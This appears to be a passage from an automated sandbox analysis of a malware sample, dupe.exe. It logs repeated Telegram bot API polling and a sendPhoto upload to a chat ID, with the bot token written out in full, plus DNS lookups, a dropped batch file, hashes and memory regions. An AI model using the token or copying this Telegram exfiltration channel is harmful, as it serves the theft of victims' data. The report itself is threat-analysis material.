      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628356

      HTTP Response

      200
    • 149.154.167.220:443
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendPhoto?chat_id=5623362319
      tls, http
      dupe.exe
      439.7kB
      10.9kB
      326
      233

      HTTP Request

      POST https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendPhoto?chat_id=5623362319

      HTTP Response

      200
    • 8.8.8.8:53
      81.144.22.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      81.144.22.2.in-addr.arpa

    • 8.8.8.8:53
      154.239.44.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      154.239.44.20.in-addr.arpa

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      151 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      13.107.21.237
      204.79.197.237

    • 8.8.8.8:53
      237.21.107.13.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      237.21.107.13.in-addr.arpa

    • 8.8.8.8:53
      88.156.103.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      88.156.103.20.in-addr.arpa

    • 8.8.8.8:53
      google.com
      dns
      dupe.exe
      56 B
      72 B
      1
      1

      DNS Request

      google.com

      DNS Response

      142.250.200.46

    • 8.8.8.8:53
      api.telegram.org
      dns
      dupe.exe
      124 B
      78 B
      2
      1

      DNS Request

      api.telegram.org

      DNS Request

      api.telegram.org

      DNS Response

      149.154.167.220

    • 8.8.8.8:53
      220.167.154.149.in-addr.arpa
      dns
      74 B
      167 B
      1
      1

      DNS Request

      220.167.154.149.in-addr.arpa

    • 8.8.8.8:53
      209.205.72.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      209.205.72.20.in-addr.arpa

    • 8.8.8.8:53
      157.123.68.40.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      157.123.68.40.in-addr.arpa

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      172.214.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.214.232.199.in-addr.arpa

    • 8.8.8.8:53
      73.144.22.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      73.144.22.2.in-addr.arpa

    • 8.8.8.8:53
      29.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      29.243.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmp91A1.tmp.bat

      Filesize

      197B

      MD5

      c2da525f000512df8189879d8a22aaf5

      SHA1

      2eb898dce2eadae799eff2a1ff18c6c4884d87d5

      SHA256

      bf0d737a228fb7a80cb635f733bb12bcdd63100f3fca04c4d923843a1147c6e0

      SHA512

      1a232b28d1ebadcbfc08cba26239969535f33ffc1191c75098f7a963b0ae74b5d07efd959ed6bfa28d226092a8beffc41c058d2e51287a80d80a7d5c748bc89f

    • C:\Users\Public\Downloads\dupe.exe

      Filesize

      111KB

      MD5

      3c6f5e7ca1f0279c860554b7b4dfaf5d

      SHA1

      15c4baaa666353eb7dd5d28a76aead8bf14bc352

      SHA256

      f7514a2e0e612b0b4211c4655fedc3a7052578f38f1bfe131e2213102c164e34

      SHA512

      1c8ac972d4ef27ec0f80e850137a8f19c95c72b97f2dede9c4d0caf007709133a5f2e248f6f04bc6e30fbbea742b8f4ae66a4f3408ab0d00ca48c48865947b09

    • memory/1644-1-0x000001B77F900000-0x000001B77F922000-memory.dmp

      Filesize

      136KB

    • memory/1644-0-0x00007FFF03BF3000-0x00007FFF03BF5000-memory.dmp

      Filesize

      8KB

    • memory/1644-2-0x00007FFF03BF0000-0x00007FFF046B1000-memory.dmp

      Filesize

      10.8MB

    • memory/1644-6-0x00007FFF03BF0000-0x00007FFF046B1000-memory.dmp

      Filesize

      10.8MB

    • memory/3456-11-0x00000168FB360000-0x00000168FB509000-memory.dmp

      Filesize

      1.7MB

    • memory/3456-12-0x00000168FB650000-0x00000168FB6FA000-memory.dmp

      Filesize

      680KB

    • memory/3456-13-0x00000168FB700000-0x00000168FB776000-memory.dmp

      Filesize

      472KB

    • memory/3456-21-0x00000168FB360000-0x00000168FB509000-memory.dmp

      Filesize

      1.7MB
